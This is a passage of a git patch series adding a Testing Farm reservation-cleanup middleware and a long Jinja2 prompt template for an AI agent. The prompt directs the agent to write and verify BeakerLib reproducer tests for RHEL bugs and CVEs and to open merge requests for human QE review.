Co-Authored-By: Claude Opus 4.6 --- ymir/agents/tf_cleanup_middleware.py | 51 ++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 ymir/agents/tf_cleanup_middleware.py diff --git a/ymir/agents/tf_cleanup_middleware.py b/ymir/agents/tf_cleanup_middleware.py new file mode 100644 index 00000000..e3c22ddc --- /dev/null +++ b/ymir/agents/tf_cleanup_middleware.py @@ -0,0 +1,51 @@ +import logging +import re + +from beeai_framework.context import RunContext, RunMiddlewareProtocol +from beeai_framework.emitter import EventMeta +from beeai_framework.tools.events import ToolSuccessEvent + +from ymir.tools.privileged.testing_farm import _testing_farm_api_delete + +logger = logging.getLogger(__name__) + + +class TFReservationCleanupMiddleware(RunMiddlewareProtocol): + """Track Testing Farm reservations and cancel leaked ones on agent crash.""" + + def __init__(self) -> None: + self._reserved: set[str] = set() + self._cancelled: set[str] = set() + + def bind(self, ctx: RunContext) -> None: + ctx.emitter.on( + re.compile(r"^tool\.reserve_testing_farm_machine\.success$"), + self._on_reserve, + ) + ctx.emitter.on( + re.compile(r"^tool\.cancel_testing_farm_request\.success$"), + self._on_cancel, + ) + + async def _on_reserve(self, event: ToolSuccessEvent, meta: EventMeta) -> None: + request_id = event.output.result.get("id") + if request_id: + self._reserved.add(request_id) + logger.debug("Tracked TF reservation %s", request_id) + + async def _on_cancel(self, event: ToolSuccessEvent, meta: EventMeta) -> None: + request_id = event.input.request_id if hasattr(event.input, "request_id") else None + if request_id: + self._cancelled.add(request_id) + logger.debug("Tracked TF cancellation %s", request_id) + + async def cleanup(self) -> None: + """Cancel any reserved machines that were not explicitly cancelled.""" + leaked = self._reserved - self._cancelled + for request_id in leaked: + logger.warning("Cleaning up leaked TF reservation %s", request_id) + try: + 
_testing_farm_api_delete(f"requests/{request_id}") + logger.info("Successfully cancelled leaked TF reservation %s", request_id) + except Exception: + logger.exception("Failed to cancel leaked TF reservation %s", request_id) From 9774017f5e7590773b83c43510c0185b6ae0a5bc Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:56:55 +0200 Subject: [PATCH 12/16] Add reproducer agent Jinja2 prompt template 717-line structured prompt that guides the LLM through the full reproducer workflow: analyzing the Jira issue, designing a BeakerLib test, provisioning a Testing Farm machine, iterating on the test until it reliably demonstrates the bug, and opening a merge request. Extracted as a Jinja2 template to keep the Python agent code focused on orchestration rather than prompt content. Uses template variables for issue metadata, tool names, and configuration. Co-Authored-By: Claude Opus 4.6 --- ymir/agents/prompts/reproducer/prompt.j2 | 717 +++++++++++++++++++++++ 1 file changed, 717 insertions(+) create mode 100644 ymir/agents/prompts/reproducer/prompt.j2 diff --git a/ymir/agents/prompts/reproducer/prompt.j2 b/ymir/agents/prompts/reproducer/prompt.j2 new file mode 100644 index 00000000..f9e714f3 --- /dev/null +++ b/ymir/agents/prompts/reproducer/prompt.j2 @@ -0,0 +1,717 @@ +# Reproducer Skill + +You are a Red Hat Enterprise Linux developer tasked with creating a minimal, automated reproducer for a bug or CVE described in a Jira issue. Your goal is to create a test that objectively demonstrates the bug, verify it on a real RHEL system via Testing Farm, and publish the result. + +You receive your understanding of the bug from the inputs: the Jira issue description, `triage_summary`, `patch_urls`, and `cve_id`. Do NOT perform root cause analysis, source code tracing, or upstream fix hunting. Use the provided `triage_summary` and Jira issue description to understand the bug. 
+ +## Input Arguments + +- `jira_issue`: {{jira_issue}} +- `package`: {{package}} +- `cve_id`: {{cve_id}} +- `patch_urls`: {{patch_urls}} +- `triage_summary`: {{triage_summary}} +- `fix_version`: {{fix_version}} +- `target_branch`: {{target_branch}} +- `dry_run`: {{dry_run}} + +## Tools + +This skill uses the following tools. Do not restrict tool usage — use any tool available as needed. + +**MCP Tools (called via MCP gateway):** +- `get_jira_details` — Get full details of a JIRA issue (fields, comments, links) +- `get_patch_from_url` — Fetch patch/commit content from a URL and return the raw diff (used to read `patch_urls` provided by the caller, NOT for searching for new patches) +- `get_maintainer_rules` — Get maintainer-specific rules and guidelines for a package +- `clone_repository` — Clone a Git repository to a local path +- `fork_repository` — Fork a Git repository (used for MR creation) +- `push_to_remote_repository` — Push a branch to a remote repository +- `open_merge_request` — Open a merge request from a fork against its original repository +- `add_merge_request_labels` — Add labels to a merge request +- `reserve_testing_farm_machine` — Reserve a Testing Farm machine with SSH access +- `get_testing_farm_reservation_details` — Get status and SSH details of a TF reservation +- `cancel_testing_farm_request` — Cancel/release a Testing Farm reservation +- `run_remote_command` — Execute a command on a remote machine via SSH +- `copy_files_to_remote` — Copy files to a remote machine via SCP + +**Local Tools (filesystem, git, analysis):** +- `map_version` — Map RHEL major version to current Y-stream and Z-stream versions. Input: `major_version` (integer, e.g. 9 or 10). Returns `y_stream`, `z_stream`, and `is_maintenance_version`. 
+- `run_shell_command` — Execute shell commands (git operations, searching) +- `view` — View file or directory contents +- `search_text` — Search for text patterns in files +- `create` — Create new files + +**Other:** +- Bash tool for shell commands (e.g., `git log`, `grep`) + +## Critical Rules + +- **NEVER use direct `git clone` commands.** Always use the `clone_repository` MCP tool for cloning repositories. +- **Do NOT perform root cause analysis, source code tracing, or upstream fix hunting.** Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Reproducer Design Principles + +Every reproducer created by this agent must follow these principles: + +1. **Minimal**: The smallest script that still hits the same code path. Drop unrelated environment setup, users, networks, and configuration. If the bug can be triggered with a three-line input file, do not use a fifty-line one. + +2. **Non-interactive**: Shell script (`.sh`, `.ksh`), one-liner file, or documented `shell -c '...'`. No prompts, no user interaction, no GUI dependencies. + +3. **Heavy setups**: If the bug requires a VM, network topology, or multi-service environment, try to simulate the same failure with a local file, small input, or reduced command sequence first. If that is impossible, state "reproducer blocked" and document what is missing. + +4. **Objective pass/fail**: The reproducer must have a machine-readable pass/fail criterion. Acceptable methods include: + - Exit code (0 = PASS, non-zero = FAIL) + - Exact string match or empty capture vs expected output + - Valgrind: `LEAK SUMMARY` lines with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` so the process exits non-zero on leaks + - Timeout vs hang (document the timeout value explicitly) + - Signal-based detection (e.g., SIGSEGV, SIGABRT for crash bugs) + +5. **Automation-ready**: The reproducer must work with `git bisect run` and CI pipelines. 
No hardcoded paths, no assumptions about the user's environment beyond the target RHEL version. + +## Workflow + +Execute the following steps in order. Track state across steps using these variables: + +- `package_name` — the RPM package name (null initially) +- `maintainer_rules` — package-specific rules from maintainer (null initially) +- `jira_data` — full Jira issue data (null initially) +- `tf_request_id` — Testing Farm reservation request ID (null initially) +- `ssh_connection` — SSH connection string for the reserved machine, e.g. `root@1.2.3.4` (null initially) +- `test_dir` — local path to the test directory created in the tests repo clone (null initially) +- `tests_clone` — path to cloned `gitlab.com/redhat/rhel/tests/` repository (null initially) +- `reproducer_verified` — whether the reproducer was successfully verified on TF machine (false initially) +- `iteration_count` — number of verification loop iterations completed (0 initially) +- `merge_request_url` — URL of the created MR in the tests repo (null initially) +- `not_reproducible_reason` — reason the bug could not be reproduced (null initially) + +--- + +### Step 1: Get Jira Issue, Check Package Exists + +1. Call `get_jira_details` with `issue_key` = `{{jira_issue}}`. +2. Save the full result as `jira_data`. Extract key details: + - Title, description, and all comments + - Component name (this is the package name unless `{{package}}` is provided) + - Fix version from `fields.fixVersions[0].name` (if present) + - Any reproducer steps, error messages, or log snippets mentioned in the issue + +3. Determine the package name: + - If `{{package}}` is provided, use it as `package_name`. + - Otherwise, extract the component name from `jira_data` and use it as `package_name`. + +4. Confirm the package repository exists by running: + ``` + GIT_TERMINAL_PROMPT=0 git ls-remote https://gitlab.com/redhat/centos-stream/rpms/ + ``` + - A successful command (exit code 0) confirms the package exists. 
+ - If the package does not exist, re-examine the Jira issue for the correct package name. If it still cannot be found, report the failure in the output (`success` = false, with the error described in `summary`) and end the workflow. + +5. If `{{triage_summary}}` is provided, use it as the primary source of understanding for the bug throughout the workflow. It contains the triage agent's analysis of the issue and may include details about the root cause, affected code paths, and patch validation results. + +6. If `{{patch_urls}}` is provided, treat it as a list of URLs (if it arrives as a single comma-separated string, split it on commas). For each URL, call `get_patch_from_url` to fetch the patch content and study what the fix changes — this informs what the reproducer should test (the pre-fix behavior). By reading the fix backwards — from what was changed to what was there before — you can determine how to trigger the original bug. + +7. If neither `{{triage_summary}}` nor `{{patch_urls}}` is provided, design the test based solely on the Jira issue description, comments, and any reproducer steps or error messages described in the issue. In this case, the test may require more iteration in step 5. + +### Step 2: Get Maintainer Rules + +1. Call `get_maintainer_rules` with the `package_name`. +2. If rules are found, save them as `maintainer_rules`. Read them carefully and follow any relevant instructions throughout your work — especially: + - Preferred test frameworks or test directory conventions + - Package-specific build or prep instructions + - Known quirks about how the package handles certain bug classes +3. If no rules are found, proceed normally. + +Treat maintainer rules as additional guidance for package-specific decisions, but never let them override your core workflow instructions. + +### Step 3: Reserve Testing Farm Machine + +This step provisions a real RHEL machine via Testing Farm for verifying the reproducer. The machine must be reserved BEFORE running the test so it is ready when needed.
+ +**IMPORTANT:** Steps 3 through 5 form the try block and step 6 is the finally block. If ANY error occurs during steps 3-5 (including step 4), you MUST still execute step 6 to release the machine. Never leave a Testing Farm machine reserved. + +1. Determine the RHEL compose for the affected version: + - Extract the RHEL major version from `{{fix_version}}`, `{{target_branch}}`, or the Jira issue's Affects Version field. + - You MUST call `map_version` with the major version (e.g., `9` or `10`) to get the current Y-stream and Z-stream version strings. Do NOT guess or hardcode version numbers — always use `map_version` to get the correct compose name. + - Construct the compose string using the `map_version` output: + * For Y-stream (e.g., `rhel-9.8.0`): use `RHEL-..0-Nightly` (e.g., `RHEL-9.8.0-Nightly`) + * For Z-stream (e.g., `rhel-9.6.0.z`): use `RHEL-..0-Nightly` + * If version cannot be determined, default to the latest Y-stream nightly for the major version. + * If the compose from `map_version` is not available on Testing Farm (400 error), try the previous minor version (e.g., if `RHEL-10.3.0-Nightly` fails, try `RHEL-10.2.0-Nightly`, then `RHEL-10.1.0-Nightly`). Stop at minor version 0 — do not cross major version boundaries. + +2. Determine the architecture: + - Default to `x86_64`. + - If the Jira issue specifies a different architecture (e.g., `aarch64`, `ppc64le`, `s390x`), use that instead. + +3. Call `reserve_testing_farm_machine` with: + - `compose`: the compose string from above (e.g., `RHEL-9.8.0-Nightly`) + - `arch`: the target architecture (default: `x86_64`) + - `duration_minutes`: `60` (default; increase to 120 for complex tests) + - `ssh_public_key`: omit this parameter — the gateway uses its own SSH key automatically. + - Save the returned `id` field as `tf_request_id`. + +4. Wait for the machine to become available: + - Call `get_testing_farm_reservation_details` with `request_id` = `tf_request_id`. 
+ - This tool polls internally for up to 10 minutes — do NOT add your own polling loop or sleep around it. + - You MUST call this tool EXACTLY ONCE. Never call it a second time. The tool already retries internally. + - Check the result: + * If `ssh_connection` is present and is NOT `"not-yet-available"`: the machine is ready. Save `ssh_connection`. + * If `state` is `"error"`, `"canceled"`, or `ssh_connection` is `"not-yet-available"`: the reservation failed or timed out. You MUST immediately jump to step 6 (cancel the reservation) and then report the error. Do NOT continue to step 4 or step 5. Do NOT retry `get_testing_farm_reservation_details`. + +5. Verify SSH connectivity: + - Call `run_remote_command` with `ssh_host` = `ssh_connection` and `command` = `"cat /etc/redhat-release"`. + - Confirm the machine is running the expected RHEL version. + - If SSH connection fails, retry once after 15 seconds (the machine may still be booting). + +### Step 4: Create tmt Test Structure Locally + +This step creates the tmt-compatible test directory structure locally. The test files will later be copied to the Testing Farm machine for verification (step 5) and committed to the tests repo for the MR (step 7). + +Use the Jira issue description, `triage_summary`, and `patch_urls` to understand the bug and design the test. The patch URLs show what the fix changes — by reading the fix you can determine what behavior to test (the pre-fix, buggy behavior). + +#### 4.1. Clone the Tests Repository + +1. Clone the RHEL tests repository using `clone_repository`: + - URL: `https://gitlab.com/redhat/rhel/tests/` + - Do NOT specify a `branch` parameter — omit it so the tool clones the default branch (it may not be `main`). + - Use a clone path under `/git-repos/` (the shared volume), e.g. `/git-repos/tests-`. + - If the clone path already exists from a previous failed attempt, delete it first with `run_shell_command("rm -rf /git-repos/tests-")` before retrying. 
+ - Save the clone path as `tests_clone`. + +2. Create the test directory: + - For CVEs: `/Security//` + - For bugs (non-CVE): `/Regression//` + - Save the directory path as `test_dir`. + +3. Create the `.fmf/version` file if it does not already exist at the tests repo root: + ``` + mkdir -p /.fmf + echo "1" > /.fmf/version + ``` + +#### 4.2. Create `ai-test-description` + +Create `/ai-test-description` with the following content structure: + +``` +=== Issue Information === +Issue: +Type: + +CVE: + +Package: +Component: +Affected Version: + +=== Analysis === + + + +Fix patches: + + +=== Test Methodology === + + +=== Expected Results === +PASS: +FAIL: + +=== References === + + +``` + +#### 4.3. Create Standalone Test Scripts (`test_*`) + +Based on the bug description from the Jira issue, `triage_summary`, and `patch_urls`, create one or more standalone test scripts. These are the actual programs/scripts that exercise the bug. + +Choose the language based on the package type: +- **C/C++ libraries** (e.g., `libxml2`, `openssl`, `glibc`): write a C program (`test_.c` or `test_.c`) that calls the vulnerable function with crafted input +- **Python packages** (e.g., `python-pillow`, `python-cryptography`): write a Python script (`test_.py`) +- **CLI tools** (e.g., `curl`, `binutils`, `grep`): write a shell script (`test_.sh`) that invokes the tool with triggering arguments +- **Libraries with bindings**: prefer the language closest to the vulnerability (C for a C library even if Python bindings exist) + +Each test script must: +- Be self-contained — no dependencies beyond the package under test and standard system tools +- Accept no interactive input +- Exit with a clear pass/fail signal using an appropriate detection method (see section 4.3.1 below) + +If the test needs crafted input files (malformed images, certificates, config files, etc.), create them as separate files in `test_dir` or generate them inline in the test script. 
Prefer generating them inline when possible to keep the test self-contained. + +**CRITICAL:** Write standalone test scripts, NOT inline heredocs in `runtest.sh`. The `runtest.sh` BeakerLib harness copies and runs these scripts; it does not contain the test logic itself. + +##### 4.3.1. Choosing the Detection Method + +Based on the bug type (inferred from the Jira issue description and triage summary), choose the appropriate pass/fail approach for your test scripts: + +1. **Crash bugs** (null pointer dereference, buffer overflow, use-after-free): + - Detection: process exits with signal (SIGSEGV, SIGABRT, SIGBUS) + - Method: run the program and check exit code; non-zero or signal = bug present + - Enhancement: use AddressSanitizer (`ASAN_OPTIONS`), Valgrind, or `GLIBC_TUNABLES=glibc.malloc.check=3` (for glibc 2.34+) to make detection more reliable + +2. **Memory leak bugs**: + - Detection: Valgrind `LEAK SUMMARY` with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` + - Alternative: pmap RSS growth over repeated runs (document which method is authoritative) + +3. **Logic bugs** (wrong output, incorrect behavior): + - Detection: compare program output against expected output + - Method: exact string match, diff, or specific pattern in output + +4. **Hang / infinite loop bugs**: + - Detection: process does not terminate within a timeout + - Method: `timeout s ` and check exit code 124 (timeout) + +5. **Information disclosure bugs**: + - Detection: program outputs data it should not + - Method: check for presence of sensitive data in output + +6. **Denial of service bugs** (excessive resource consumption): + - Detection: resource usage exceeds threshold + - Method: measure CPU time, memory, or disk usage + +#### 4.4. Create `runtest.sh` (BeakerLib Harness) + +Create `/runtest.sh` as an executable BeakerLib test harness (`chmod +x`). 
The harness follows this structure: + +```bash +#!/bin/bash +# SPDX-License-Identifier: GPL-2.0-or-later +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +# +# runtest.sh of +# Description: +# Author: Ymir AI Agent +# +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +. /usr/share/beakerlib/beakerlib.sh || exit 1 + +PACKAGE="" + +rlJournalStart + rlPhaseStartSetup + rlAssertRpm "$PACKAGE" + rlRun "TmpDir=\$(mktemp -d)" 0 "Creating tmp directory" + ORIG_DIR="$(pwd)" + rlRun "pushd \$TmpDir" + # Copy test scripts and any input files to TmpDir + rlRun "cp \$ORIG_DIR/test_* \$TmpDir/" 0 "Copying test scripts" + # + # rlRun "gcc -o test_ test_.c $(pkg-config --cflags --libs ) -Wall" 0 "Compiling test program" + # + # rlRun "dnf install -y " 0 "Installing dependency" + rlPhaseEnd + + rlPhaseStartTest "" + # Run the reproducer and check the result + # + + # Example for crash bug: + # rlRun "./test_ " 0 "Program should not crash with fix applied" + + # Example for logic bug: + # rlRun "output=\$(./test_.sh)" 0 "Running reproducer" + # rlAssertEquals "Output should match expected" "$output" "" + + # Example for memory bug: + # rlRun "valgrind --errors-for-leak-kinds=definite,indirect --error-exitcode=1 ./test_" 0 "No memory leaks" + + # Example for hang bug: + # rlRun "timeout 10s ./test_.sh" 0 "Program should complete within 10 seconds" + rlPhaseEnd + + rlPhaseStartCleanup + rlRun "popd" + rlRun "rm -rf \$TmpDir" 0 "Removing tmp directory" + rlPhaseEnd +rlJournalPrintText +rlJournalEnd +``` + +Key rules for `runtest.sh`: +- `ORIG_DIR="$(pwd)"` must be set before `pushd` so test files can be copied to `$TmpDir`. +- The `rlRun` exit code check reflects the **fixed** behavior: `rlRun "command" 0` means PASS when the command exits 0 (fix applied, no crash). When the bug is present, the command will exit non-zero or crash, causing the test phase to FAIL.
+- For crash bugs where you expect a signal: use `rlRun "command" 0` — when the fix is applied the program should not crash (exit 0), and when the bug is present it will crash (non-zero exit). +- For tests that need compilation: install `gcc`, `make`, and development headers in the Setup phase. +- Keep the harness minimal — all test logic belongs in the standalone `test_*` scripts. + +#### 4.5. Create `main.fmf` (FMF Metadata) + +Create `/main.fmf` with appropriate metadata: + +For CVE tests: +```yaml +summary: Security test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies + # - gcc (if test needs compilation) + # - valgrind (if using valgrind detection) +duration: 10m +tag: + - + - Security + - CVE +tier: "1" +``` + +For bug (regression) tests: +```yaml +summary: Regression test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies +duration: 10m +tag: + - + - Regression +tier: "1" +``` + +Adjust `duration` based on the test complexity. Use `5m` for simple tests, `10m` for standard tests, and `30m` for tests that require compilation, large inputs, or Valgrind. + +### Step 5: Copy Reproducer to TF Machine, Run, Iterate + +This is the agentic verification loop — the core of the agent. The goal is to verify that the reproducer actually detects the bug on a real RHEL system. This step iterates: copy the test, run it, analyze the result, fix issues, and try again. + +**Iteration limit:** Maximum 5 iterations. If the reproducer cannot be verified after 5 attempts, stop and report the bug as not reproducible (with documentation of what was tried). + +#### 5.1. Copy Test Files to the TF Machine + +1. 
Call `copy_files_to_remote` with: + - `ssh_host`: `ssh_connection` (from step 3) + - `local_paths`: list of all files in `test_dir` (e.g., `["/runtest.sh", "/test_.c", "/main.fmf", "/ai-test-description"]`) + - `remote_dir`: `/tmp/reproducer` + +2. Verify the copy succeeded by listing the remote directory: + ``` + run_remote_command(ssh_host=ssh_connection, command="ls -la /tmp/reproducer/") + ``` + +#### 5.2. Install Dependencies and Prepare the Environment + +1. Install the package under test and any dependencies on the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y beakerlib ") + ``` + +2. If the test requires compilation (C test program), install build tools: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y gcc make ") + ``` + +3. If the test requires Valgrind: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y valgrind") + ``` + +4. Record the installed package version for the report: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q ") + ``` + +#### 5.3. Run the Reproducer + +1. Make the test scripts executable: + ``` + run_remote_command(ssh_host=ssh_connection, command="chmod +x /tmp/reproducer/runtest.sh /tmp/reproducer/test_*") + ``` + +2. Run the BeakerLib test harness: + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./runtest.sh", timeout=600) + ``` + +3. Alternatively, if running the standalone reproducer directly (for faster iteration during debugging): + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./ ", timeout=300) + ``` + +4. Capture the output, exit code, and any signals from the command result. + +#### 5.4. 
Analyze the Result + +Compare the output and exit code against the expected detection behavior: + +**Case A: Bug is REPRODUCED (test FAILS as expected — the bug is present)** +- The detection method fires: crash detected, wrong output observed, timeout hit, memory leak found, etc. +- This means the reproducer WORKS. The test correctly detects the bug on the unpatched system. +- Set `reproducer_verified` = true. +- Proceed to step 6 (return machine), then step 7 (create MR). + +**Case B: Bug is NOT reproduced (test PASSES — the bug is not triggered)** +- The program does not crash, output is correct, no timeout, no leak, etc. +- This means EITHER the reproducer is wrong OR the bug is not present on this system. +- Continue to 5.5 (iterate). + +**Case C: Test execution error (unrelated failure)** +- The test fails for a reason unrelated to the bug: missing dependency, compilation error, permission denied, wrong path, syntax error, etc. +- These are test bugs, not reproduction failures. +- Continue to 5.5 (iterate) — fix the test, not the detection method. + +**Important:** On a system WITHOUT the fix applied, a working reproducer should FAIL (Case A). The `rlRun "command" 0` in BeakerLib expects exit code 0 (fixed behavior). When the bug is present, the command exits non-zero, causing the BeakerLib phase to report FAIL. This FAIL means the reproducer is working correctly — it detected the bug. + +#### 5.5. Iterate on Failure (Cases B and C) + +If the reproducer did not detect the bug, increment `iteration_count` and analyze why. The analysis depends on the failure mode: + +**For Case B (bug not triggered):** + +1. **Check the package version**: Is the installed version actually vulnerable? If the system already has the fix, the test will PASS (correctly). Verify: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q --changelog | head -30") + ``` + If the fix is already applied on this compose, the test will not reproduce the bug. 
This is an expected outcome — note it and consider using an older compose, or document that the fix is already present and the reproducer is validated by the test's PASS/FAIL design. + +2. **Check trigger conditions**: Review whether the test correctly exercises the bug: + - Is the correct binary/library being tested? (Check `which `, `rpm -qf $(which )`) + - Are the right flags/options being used? + - Is the input data correctly crafted? (Examine it on the remote machine) + - Are environment variables or configuration settings correct? + +3. **Check the detection method**: Is the test checking for the right signal? + - For crash bugs: is the program actually crashing but being caught by a signal handler? Try running under `gdb` or checking `dmesg` / `journalctl` for segfault records. + - For logic bugs: is the expected output format wrong? Run the command manually and inspect actual output. + - For memory bugs: are you using the right Valgrind options? + +4. **Refine the test**: Based on the analysis, modify the test: + - Adjust input data (different size, different malformed fields, different structure) + - Add or change command-line flags + - Modify preconditions (create specific files, set environment variables) + - Try a different approach to triggering the bug + - Simplify — remove unnecessary complexity that might mask the bug + +**For Case C (test execution error):** + +1. **Fix compilation errors**: Read the error output, fix the test source code +2. **Fix missing dependencies**: Install additional packages +3. **Fix path issues**: Correct file paths, ensure scripts are executable +4. **Fix syntax errors**: Correct shell or program syntax +5. **Fix permission issues**: Adjust file permissions or run as appropriate user + +**After modifying the test:** + +1. Update the test files in `test_dir` locally (edit the files in place). +2. 
Re-copy the updated files to the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="rm -rf /tmp/reproducer/*") + copy_files_to_remote(ssh_host=ssh_connection, local_paths=[], remote_dir="/tmp/reproducer") + ``` +3. If `iteration_count` is still below 5, re-run the reproducer (go back to 5.3). +4. If `iteration_count` >= 5, stop iterating and proceed to 5.6. + +#### 5.6. Handle Non-Reproducible Bugs + +If the bug could not be reproduced after the maximum number of iterations: + +1. Set `reproducer_verified` = false. +2. Document what was tried in each iteration: + - What trigger conditions were tested + - What the output/exit code was in each attempt + - What changes were made between iterations + - Why each attempt failed to reproduce the bug +3. Determine the likely reason for non-reproducibility: + - **Fix already applied**: the compose already includes the fix + - **Race condition**: requires specific timing that cannot be reliably triggered + - **Environment-specific**: requires hardware, kernel, or configuration not available on the TF machine + - **Complex preconditions**: requires a multi-service setup that cannot be simulated + - **Insufficient information**: the Jira issue and triage summary did not provide enough detail to design an effective trigger +4. Save the documentation as `not_reproducible_reason` for the output schema. +5. Recommend setting Test Coverage to "Regression Only" in the output `summary`; the workflow, not you, posts the Jira comment. + +### Step 6: Return Testing Farm Machine + +**CRITICAL:** This step MUST always execute, regardless of whether steps 3-5 succeeded or failed. Treat steps 3-5 plus step 6 as a try/finally block — step 6 is the `finally`. + +1. If `tf_request_id` is set (a machine was reserved): + - Call `cancel_testing_farm_request` with `request_id` = `tf_request_id`. + - Log whether the cancellation succeeded or failed (but do not halt the workflow on failure). + +2.
If `tf_request_id` is not set (reservation was never made or failed before returning a request ID), skip this step. + +3. Clear `ssh_connection` to prevent accidental reuse. + +Even if the reproducer verification succeeded, the machine must be returned. Even if an unrelated error occurred, the machine must be returned. Even if the agent is about to report an error, the machine must be returned. There are no exceptions. + +### Step 7: Create Merge Request (only if reproducer works) + +This step publishes the verified reproducer test as a merge request to the RHEL tests repository. Only execute this step if `reproducer_verified` is true AND `{{dry_run}}` is not true. + +If `reproducer_verified` is false, skip this step entirely. +If `{{dry_run}}` is true, skip this step but log what would have been created. + +#### 7.1. Prepare the Branch + +1. In the `tests_clone` directory, create a working branch: + ``` + git -C checkout -B reproducer/ + ``` + +2. Make shell scripts executable before staging (git tracks file mode): + ``` + chmod +x //runtest.sh //*.sh //*.ksh + ``` + +3. Stage all test files: + ``` + git -C add / + ``` + +4. Commit with a descriptive message: + ``` + : add reproducer for + + in ."> + in ."> + + + + Resolves: + + This test was created by Ymir, a Red Hat Enterprise Linux software maintenance AI agent. + + Assisted-by: Ymir + ``` + +#### 7.2. Fork, Push, and Create MR + +1. Fork the tests repository by calling `fork_repository` with: + - `repository`: `https://gitlab.com/redhat/rhel/tests/` + - Save the returned `fork_url`. + - If `fork_repository` fails (the tool returns an error), set `merge_request_url` to null, include the error message in the output `summary`, and skip the rest of step 7 entirely. Proceed directly to producing the output JSON. The reproducer test files are still valid in `test_dir` — only the MR creation is skipped. + +2. 
Push the branch by calling `push_to_remote_repository` with: + - `repository`: the fork URL from above + - `clone_path`: `tests_clone` + - `branch`: `reproducer/` + - If push fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +3. Create the merge request by calling `open_merge_request` with: + - `fork_url`: from above + - `title`: `: add reproducer for ` + - `source`: `reproducer/` + - `target`: the default branch of the tests repository (check with `run_shell_command("git -C symbolic-ref refs/remotes/origin/HEAD --short")` and strip the `origin/` prefix) + - `description`: + ``` + ## Summary + + in ."> + in ."> + + + + ## Pass/Fail Criteria + + - **PASS**: + - **FAIL**: + + ## Verification + + Verified on Testing Farm (request ID: ). + The reproducer successfully on (). + + ## Test Structure + + - `ai-test-description` — issue analysis and test specification + - `runtest.sh` — BeakerLib test harness + - `main.fmf` — FMF metadata + - `test_*` — standalone reproducer script(s) + + Resolves: + + --- + + > **Warning: AI-Generated MR**: Created by Ymir AI assistant. AI may make mistakes + or produce incorrect test logic. **Carefully review the test before merging. + Human RHEL QE needs to approve this contribution before merging.** + > + > By merging this MR, you agree to follow the Guidelines on Use of AI Generated Content + and Guidelines for Responsible Use of AI Code Assistants. + + ## Want to make changes to this MR? + + You can check out the source branch from the fork and push your changes directly. + + ## Customize Ymir's behavior for your package + + If there is anything that could be adjusted regarding Ymir's behavior + and is specific to your package, you can submit an MR to + gitlab.com/redhat/centos-stream/rules/. + See the customization docs for details. + + ## Questions or Issues? 
+ + **Contact:** redhat-ymir-agent@redhat.com | **Slack:** #forum-ymir-package-automation | + **Report AI Issues:** Jira (project: Packit, component: jotnar) or GitHub + ``` + - If MR creation fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +4. Save the returned MR URL as `merge_request_url`. + +5. Add the reproducer label by calling `add_merge_request_labels` with: + - `merge_request_url`: the MR URL from above + - `labels`: `["ymir_reproducer"]` + +--- + +**Note:** Do NOT post a Jira comment yourself. The workflow handles Jira commenting +automatically after you return your output. Focus on producing accurate output fields. + +--- + +## Output Schema + +The final output must be a JSON object: + +```json +{ + "jira_issue": "RHEL-12345", + "success": true, + "reproducer_type": "cve", + "test_mr_url": "https://gitlab.com/redhat/rhel/tests/ksh/-/merge_requests/123", + "testing_farm_request_id": "tf-request-abc123", + "pass_fail_criteria": "PASS: program exits 0 (fix applied, no crash). FAIL: program exits with SIGSEGV (bug present, buffer overflow triggered).", + "summary": "Created reproducer for CVE-2025-12345 in libfoo. The vulnerability is a heap buffer overflow in parse_header() triggered by a malformed PNG with chunk length > 0x7fffffff. Test sends crafted input and checks for crash via exit code.", + "not_reproducible_reason": null +} +``` + +On failure or non-reproducible result: + +```json +{ + "jira_issue": "RHEL-12345", + "success": false, + "reproducer_type": "bug", + "test_mr_url": null, + "testing_farm_request_id": "tf-request-xyz789", + "pass_fail_criteria": "PASS: command completes within 10s. FAIL: command hangs (timeout after 10s).", + "summary": "Attempted to reproduce RHEL-12345 (infinite loop in parser). 
The bug requires a specific interleaving of concurrent requests that could not be reliably reproduced in 5 attempts on a single-core TF machine.", + "not_reproducible_reason": "Race condition requires multi-threaded workload with specific timing. Attempted with stress-ng and taskset but could not trigger the hang reliably." +} +``` + +The output fields: +- `jira_issue` (string) — the Jira issue key (upper-case) +- `success` (bool) — whether a working reproducer was created and verified +- `reproducer_type` (string) — `"cve"` or `"bug"` +- `test_mr_url` (string or null) — URL of the merge request in the tests repository (null if not created) +- `testing_farm_request_id` (string or null) — Testing Farm request ID used for verification +- `pass_fail_criteria` (string) — human-readable description of what PASS and FAIL mean +- `summary` (string) — concise description of the reproducer +- `not_reproducible_reason` (string or null) — explanation if the bug could not be reproduced (null on success) From 8d79192badad0ee105a852e7eb745470530cecda Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:57:04 +0200 Subject: [PATCH 13/16] Add BeeAI reproducer agent orchestration MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Main agent module that wires together the reproducer workflow: - Dedup guard: checks Jira labels before starting to prevent duplicate runs across concurrent deployments - Tool registration: assembles the MCP gateway tools (GitLab, Testing Farm, SSH) with Jira and file-access tools - TF cleanup middleware: 